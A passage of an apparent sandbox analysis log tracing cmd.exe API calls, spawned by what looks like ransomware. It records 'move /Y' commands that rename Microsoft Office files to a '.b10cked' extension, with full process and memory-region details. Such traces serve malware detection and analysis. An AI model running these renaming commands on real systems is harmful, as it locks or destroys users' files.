lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0154.219] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0154.219] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0154.219] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0154.219] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0154.219] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0154.219] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0154.219] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0154.219] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0154.220] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0154.220] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0154.220] GetEnvironmentStringsW () returned 0x4c2360* [0154.220] FreeEnvironmentStringsW (penv=0x4c2360) returned 1 [0154.220] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0154.220] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0154.220] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0154.220] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0154.220] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0154.220] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0154.220] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0154.220] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0154.220] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0154.220] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0154.220] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f480 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0154.220] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f480, lpFilePart=0x30f47c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f47c*="Desktop") returned 0x18 [0154.220] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0154.221] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f1fc | out: lpFindFileData=0x30f1fc) returned 0x4c09f0 [0154.221] FindClose (in: hFindFile=0x4c09f0 | out: hFindFile=0x4c09f0) returned 1 [0154.221] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f1fc | out: lpFindFileData=0x30f1fc) returned 0x4c09f0 [0154.221] FindClose (in: hFindFile=0x4c09f0 | out: hFindFile=0x4c09f0) returned 1 [0154.221] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f1fc | out: lpFindFileData=0x30f1fc) returned 0x4c09f0 [0154.221] FindClose (in: hFindFile=0x4c09f0 | out: hFindFile=0x4c09f0) returned 1 [0154.221] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0154.221] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0154.221] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0154.221] GetEnvironmentStringsW () returned 0x4c0210* [0154.222] FreeEnvironmentStringsW (penv=0x4c0210) returned 1 [0154.222] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0154.222] GetConsoleOutputCP () returned 0x1b5 [0154.222] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0154.222] GetUserDefaultLCID () returned 0x409 [0154.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0154.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f5c0, cchData=128 | out: lpLCData="0") returned 2 [0154.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f5c0, cchData=128 | out: lpLCData="0") returned 2 [0154.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f5c0, cchData=128 | out: lpLCData="1") returned 2 [0154.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0154.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0154.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0154.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0154.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0154.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0154.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0154.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0154.223] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0154.223] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0154.223] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0154.224] GetConsoleTitleW (in: lpConsoleTitle=0x4b0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0154.225] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0154.225] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0154.225] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0154.225] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0154.226] _wcsicmp (_String1="move", _String2=")") returned 68 [0154.226] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0154.226] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0154.226] _wcsicmp (_String1="IF", _String2="move") returned -4 [0154.226] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0154.226] _wcsicmp (_String1="REM", _String2="move") returned 5 [0154.226] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0154.230] GetConsoleTitleW (in: lpConsoleTitle=0x30f2b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0154.263] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0154.263] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0154.263] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0154.263] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0154.263] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0154.263] _wcsicmp (_String1="move", _String2="CD") returned 10 [0154.263] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0154.263] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0154.263] _wcsicmp (_String1="move", _String2="REN") returned -5 [0154.263] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0154.263] _wcsicmp (_String1="move", _String2="SET") returned -6 [0154.263] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0154.263] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0154.263] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0154.263] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0154.263] _wcsicmp (_String1="move", _String2="MD") returned 11 [0154.263] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0154.263] _wcsicmp (_String1="move", _String2="RD") returned -5 [0154.263] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0154.263] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0154.263] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0154.263] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0154.263] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0154.264] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0154.264] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0154.264] _wcsicmp (_String1="move", _String2="VER") returned -9 [0154.264] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0154.264] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0154.264] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0154.264] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0154.264] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0154.264] _wcsicmp (_String1="move", _String2="START") returned -6 [0154.264] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0154.264] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0154.264] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0154.266] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0154.266] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0154.266] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x30f074, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x30f06c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x30f06c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0154.266] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0154.266] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0154.266] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0154.266] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0154.266] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0154.266] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0154.266] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0154.266] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0154.266] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0154.267] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0154.268] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0154.268] _wcsicmp (_String1="MSOINT~2.TRX", _String2=".") returned 63 [0154.268] _wcsicmp (_String1="MSOINT~2.TRX", _String2="..") returned 63 [0154.268] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\msoint~2.trx")) returned 0x2020 [0154.268] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4c1f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0154.268] SetErrorMode (uMode=0x0) returned 0x0 [0154.268] SetErrorMode (uMode=0x1) returned 0x0 [0154.268] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~2.TRX", nBufferLength=0x104, lpBuffer=0x30e9fc, lpFilePart=0x30e9e4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~2.TRX", lpFilePart=0x30e9e4*="MSOINT~2.TRX") returned 0x3c [0154.268] SetErrorMode (uMode=0x0) returned 0x1 [0154.268] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0154.269] _wcsicmp (_String1="MSOINT~2.TRX", _String2=".") returned 63 [0154.269] _wcsicmp (_String1="MSOINT~2.TRX", _String2="..") returned 63 [0154.269] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\msoint~2.trx")) returned 0x2020 [0154.269] SetErrorMode (uMode=0x0) returned 0x0 [0154.269] SetErrorMode (uMode=0x1) returned 0x0 [0154.269] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~2.TRX", nBufferLength=0x104, lpBuffer=0x30ee78, lpFilePart=0x30ec10 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~2.TRX", lpFilePart=0x30ec10*="MSOINT~2.TRX") returned 0x3c [0154.269] SetErrorMode (uMode=0x0) returned 0x1 [0154.269] SetErrorMode (uMode=0x0) returned 0x0 [0154.269] SetErrorMode (uMode=0x1) returned 0x0 [0154.269] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x30f080, lpFilePart=0x30ec10 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll.b10cked", lpFilePart=0x30ec10*="MSOINTL.REST.trx_dll.b10cked") returned 0x4c [0154.269] SetErrorMode (uMode=0x0) returned 0x1 [0154.269] SetLastError (dwErrCode=0x0) [0154.269] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\msointl.rest.trx_dll.b10cked")) returned 0xffffffff [0154.269] GetLastError () returned 0x2 [0154.269] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x30e58c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30e58c) returned 0x4c2130 [0154.270] FindNextFileW (in: hFindFile=0x4c2130, lpFindFileData=0x30e58c | out: lpFindFileData=0x30e58c) returned 0 [0154.270] GetLastError () returned 0x12 [0154.270] FindClose (in: hFindFile=0x4c2130 | out: hFindFile=0x4c2130) returned 1 [0154.272] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x4c1cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4c1cc0) returned 0x4c2130 [0154.272] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x30e824, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0154.272] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x30e824, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll", lpFilePart=0x0) returned 0x44 [0154.272] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\msointl.rest.trx_dll")) returned 0x2020 [0154.272] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\msointl.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\msointl.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0154.273] FindClose (in: hFindFile=0x4c2130 | out: hFindFile=0x4c2130) returned 1 [0154.273] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x30e7d8 | out: _Buffer=" 1") returned 9 [0154.273] _get_osfhandle (_FileHandle=1) returned 0x7 [0154.273] GetFileType (hFile=0x7) returned 0x2 [0154.273] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0154.273] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30e764 | out: lpMode=0x30e764) returned 1 [0154.273] _get_osfhandle (_FileHandle=1) returned 0x7 [0154.273] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x30e798 | out: lpConsoleScreenBufferInfo=0x30e798) returned 1 [0154.274] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0154.274] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x30e7d8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0154.274] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x30e7bc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x30e7bc*=0x1a) returned 1 [0154.274] _get_osfhandle (_FileHandle=1) returned 0x7 [0154.274] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0154.275] _get_osfhandle (_FileHandle=1) returned 0x7 [0154.275] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0154.275] _get_osfhandle (_FileHandle=0) returned 0x3 [0154.275] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0154.275] SetConsoleInputExeNameW () returned 0x1 [0154.275] GetConsoleOutputCP () returned 0x1b5 [0154.275] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0154.275] SetThreadUILanguage (LangId=0x0) returned 0x409 [0154.275] exit (_Code=0) Process: id = "257" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0x15c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 21226 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 21227 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 21228 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 21229 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 21230 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 21231 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 21232 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 21233 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 21234 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 21235 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 21236 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 21237 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 21238 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 21239 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 21240 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 21241 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 21242 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 21243 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 21244 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 21245 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 21246 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 21247 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 21248 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 21249 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 21250 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 21251 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 21252 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 21253 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 21254 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 21255 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 21256 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 21257 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = 